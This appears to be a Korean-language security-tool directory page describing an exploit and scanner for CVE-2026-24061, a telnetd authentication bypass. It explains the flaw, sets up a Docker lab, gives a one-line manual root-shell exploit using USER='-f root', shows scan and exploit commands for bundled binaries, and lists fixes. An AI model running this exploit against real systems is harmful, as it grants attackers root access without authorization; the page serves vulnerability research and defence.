Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-24061 — CVE-2026-24061에 대한 익스플로잇 및 스캐너로, 조작된 USER 환경 변수를 통해 루트 셸을 부여하는 telnetd 인증 우회 취약점입니다. Docker 환경 설정과 크로스 플랫폼 익스플로잇 바이너리를 포함합니다. | Kitploit
도구/GitHubGitHub/parad0x7e/cve-2026-24061
Vulnerability AnalysisExploitationNetwork SecurityPenetration TestingAuthenticationRemote Access Tool
GitHubparad0x7e/cve-2026-24061

CVE-2026-24061

CVE-2026-24061에 대한 익스플로잇 및 스캐너로, 조작된 USER 환경 변수를 통해 루트 셸을 부여하는 telnetd 인증 우회 취약점입니다. Docker 환경 설정과 크로스 플랫폼 익스플로잇 바이너리를 포함합니다.

저장소 보기
7개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-24061: telnetd 인증 우회 취약점

CVE-2026-24061은 telnetd의 인증 우회 취약점으로, 공격자가 특정 환경 변수 조합을 통해 신원 검증을 우회하고 직접 루트 권한 셸을 획득할 수 있게 합니다.

telnetd의 인증 로직에 결함이 있습니다. -a 옵션(자동 로그인)과 특정 USER 환경 변수(예: -f root)를 함께 사용하면 정상적인 인증 과정을 우회하고 root 사용자로 직접 로그인할 수 있습니다.

소개

GNU InetUtils는 GNU 프로젝트 산하의 기본 네트워크 도구 모음입니다. ftp, telnet, rsh, rlogin, tftp 등 많은 전통적인 네트워크 클라이언트와 데몬을 포함하여 포괄적이고 GNU 스타일의 네트워크 구성 요소 라이브러리를 제공합니다. telnetd는 이 툴킷에서 들어오는 Telnet 연결 요청을 처리하는 서버 프로그램으로, 원격 사용자에게 대화형 터미널 인터페이스(일반적으로 셸)를 제공하는 것이 주요 역할입니다.

작동 방식

  1. 일반적으로 inetd 또는 xinetd에 의해 포트 23에서 모니터링됩니다. 요청이 도착하면 telnetd가 시작됩니다.
  2. Telnet 프로토콜 고유의 옵션 협상(터미널 유형, 창 크기, 문자 집합 등)을 처리합니다.
  3. 일반적으로 시스템의 기본 login 프로그램을 호출하여 사용자 이름과 비밀번호를 검증합니다.
  4. 로그인 성공 후 사용자에게 의사 터미널을 할당하고 지정된 셸을 시작합니다.

참고 자료

  • https://github.com/yanxinwu946/CVE-2026-24061--telnetd
  • https://github.com/vulhub/vulhub/
  • https://forum.butian.net/share/4766

환경 설정

먼저 이 저장소를 로컬에 다운로드합니다. 디렉터리 구조는 다음과 같습니다:

이 디렉터리에서 다음 명령을 실행하여 CVE-2026-24061 취약 환경을 시작합니다:

root@kitploit:~
docker compose up -d --build

시작 후 telnet 서비스는 0.0.0.0:2323에서 실행됩니다.

취약점 원리

  1. telnetd의 -a 옵션은 자동 로그인 기능을 활성화하는 데 사용됩니다.
  2. -a가 활성화되면 telnetd는 USER 환경 변수를 로그인 사용자 이름으로 읽습니다.
  3. USER 환경 변수가 -f root로 설정되면 telnetd는 -f를 옵션 플래그로, root를 대상 사용자로 잘못 해석합니다.
  4. 이로 인해 인증 검사가 우회되어 root 사용자로 직접 세션이 수립됩니다.

취약점 악용

수동 악용

root@kitploit:~
# USER 환경 변수를 설정하고 telnet -a로 연결
env USER='-f root' telnet -a 127.0.0.1 2323

성공 시 root 권한을 가진 대화형 셸을 얻을 수 있습니다:

도구 기반 악용

root@kitploit:~
cd exp

exp, exp_darwin, exp.exe 세 개의 파일을 볼 수 있으며, 각각 Linux, Mac, Windows용 실행 파일입니다. 필요한 것을 선택하세요. 도구 소스 코드도 제공됩니다. 다른 버전이 필요하면 직접 컴파일할 수 있습니다. 여기서는 상세한 도움말 정보가 있는 Linux용 exp를 사용합니다.

취약점 존재 여부 탐지(기본적으로 포트 23 스캔):

root@kitploit:~
./exp -mode scan -target your-ip -port your-port

취약점 악용 및 셸 획득:

root@kitploit:~
./exp -mode exploit -target your-ip -port your-port

수정 방법

  1. inetutils-telnetd를 최신 버전으로 업그레이드합니다.
  2. 프로덕션 환경에서 telnet 서비스를 비활성화하고 SSH를 대신 사용합니다.
  3. telnet 서비스를 격리된 내부 네트워크 환경에 배포합니다.
  4. 방화벽을 사용하여 telnet 서비스의 접근 소스를 제한합니다.

면책 조항

이 프로젝트는 보안 연구 및 교육 목적으로만 제공됩니다. 승인되지 않은 시스템에서 사용하지 마십시오. 이 도구 사용으로 인해 발생하는 모든 결과에 대한 법적 책임은 사용자에게 있습니다.

도구 다운로드